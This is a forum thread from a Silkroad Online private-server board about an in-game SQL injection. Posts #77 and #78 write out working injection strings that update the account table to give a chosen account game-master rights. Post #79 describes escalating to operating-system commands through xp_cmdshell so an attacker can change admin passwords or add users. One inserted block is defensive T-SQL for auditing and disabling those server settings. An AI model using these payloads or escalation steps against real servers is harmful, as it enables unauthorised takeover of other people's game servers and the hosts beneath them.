[INFORMATION] SQL Injection (ingame)
Discussion on [INFORMATION] SQL Injection (ingame) within the SRO Private Server forum part of the Silkroad Online category.
01/03/2017, 17:55
|
#76
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
|
Quote:
Originally Posted by geheimerbauer
But it is just possible to get access to SRO_VT_SHARD.dbo or can i get access to SRO_VT_ACCOUNT.dbo too?
|
It's a SQL inject, you can access whatever DB you wish.
|
|
|
01/04/2017, 00:27
|
#77
|
elite*gold: 0
Join Date: Nov 2009
Posts: 102
Received Thanks: 14
|
Thank you.
I don't know SQL very well. I just have some basic knowledge of Java.
I'm also not so familiar with Silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not really a use for it when you have access to the DB, but it could happen that you lose Fortress
|
|
|
01/04/2017, 09:16
|
#78
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
|
Quote:
Originally Posted by geheimerbauer
Thank you.
I don't know SQL very well. I just have some basic knowledge of Java.
I'm also not so familiar with Silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not really a use for it when you have access to the DB, but it could happen that you lose Fortress
|
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1, sec_content = 1 WHERE StrUserID = 'YourAccountID';--
Will not work if they changed SRO_VT_ACCOUNT to something else ^^
|
|
|
01/08/2017, 03:19
|
#79
|
elite*gold: 56
Join Date: Oct 2013
Posts: 1,165
Received Thanks: 762
|
Quote:
Originally Posted by geheimerbauer
Thank you.
I don't know SQL very well. I just have some basic knowledge of Java.
I'm also not so familiar with Silkroad files, but is it possible to make a GM account like this?
Code:
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';--
a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';--
I know there is not really a use for it when you have access to the DB, but it could happen that you lose Fortress
|
Yes, it should work if the database has not been renamed, and even if it has, you can have the database's name sent to you (by using Silkroad's message system).
Furthermore, if xp_cmdshell is enabled, it is possible to run whole CMD commands (e.g. change the admin's password or even create a new user for yourself) - but that only works if the SQL service is running with local administrator rights.
And since the user that manages the Silkroad databases is usually the sa user, you can, if in doubt, enable xp_cmdshell yourself ( )
With CMD you can then start PowerShell, which is much more powerful than CMD, and if you know PowerShell and have administrator rights, then it's all over.
The SQL injection is far more critical than many think.
|
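Added example, not part of any post in this thread: post #79 ties the impact of the injection to three server-side settings (whether xp_cmdshell is enabled, whether the game connects as sa or another sysadmin login, and which account the SQL Server service runs as). The T-SQL below is one way for a server operator to audit and tighten them; `game_login` is a hypothetical placeholder for the login in the game server's connection settings.

```sql
-- Added audit example for Microsoft SQL Server; run it as an administrator
-- on the instance that hosts the game databases.
-- 'game_login' is a placeholder (assumption), not a name from the thread.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means OS commands can be
--    started from T-SQL, which is what turns a SQL injection into host access.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Which logins are members of sysadmin? Any of them can switch
--    xp_cmdshell back on, so the game's login must not appear here.
SELECT p.name AS login_name, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 3. Direct check for the game's login: 1 = sysadmin, 0 = not sysadmin,
--    NULL = login name not valid.
SELECT IS_SRVROLEMEMBER('sysadmin', 'game_login') AS game_login_is_sysadmin;

-- 4. Which Windows account does the SQL Server service run as? It should be
--    a low-privilege service account, not a local administrator.
--    (sys.dm_server_services requires SQL Server 2008 R2 SP1 or later.)
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 5. Make sure xp_cmdshell is off, then hide the advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 5 only holds if step 3 returns 0: a login with sysadmin rights can re-enable the option, so moving the game server to a non-sysadmin login is the change that matters.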
|
|
02/04/2017, 17:32
|
#80
|
elite*gold: 0
Join Date: Feb 2013
Posts: 75
Received Thanks: 10
|
what da hell did I just see?????????? I didn't investigate that exploit until now
oh-no seriously vsro are a piece **** yada-yada-yada
yet it's still possible to restrict it by blocking table names @ ServerSide (only) inside AbuseFilter.txt; at least whoever tries to execute it will get a crash
honestly I didn't execute that horrible exploit yet, so I can't confirm whether the fix I just mentioned works or not (if it could be called a fix after all xD)
|
|
|
02/04/2017, 18:06
|
#81
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Quote:
Originally Posted by ZeonNETWORK
what da hell did I just see?????????? I didn't investigate that exploit until now
oh-no seriously vsro are a piece **** yada-yada-yada
yet it's still possible to restrict it by blocking table names @ ServerSide (only) inside AbuseFilter.txt; at least whoever tries to execute it will get a crash
honestly I didn't execute that horrible exploit yet, so I can't confirm whether the fix I just mentioned works or not (if it could be called a fix after all xD)
|
That's the only injection there is. Stop over exaggerating please.
|
|
|
02/04/2017, 18:15
|
#82
|
elite*gold: 0
Join Date: Feb 2013
Posts: 75
Received Thanks: 10
|
Quote:
Originally Posted by Exo
That's the only injection there is. Stop over exaggerating please.
|
you mean there's a lot of SQL injections out there?
well I don't know, it's been a long time since vsro (stuck with BR and Tsro somehow)
okay, can you post the common injections??
|
|
|
02/04/2017, 18:51
|
#83
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Quote:
Originally Posted by ZeonNETWORK
you mean there's a lot of SQL injections out there?
well I don't know, it's been a long time since vsro (stuck with BR and Tsro somehow)
okay, can you post the common injections??
|
There aren't any other injections in-game. All other strings are being checked before a procedure call is executed. This is the only one.
|
|
|
11/19/2018, 15:37
|
#84
|
elite*gold: 0
Join Date: Dec 2011
Posts: 42
Received Thanks: 2
|
nobody knows
some new way of SQL injection, coz that way is so old
|
|
|
|
|
All times are GMT +2.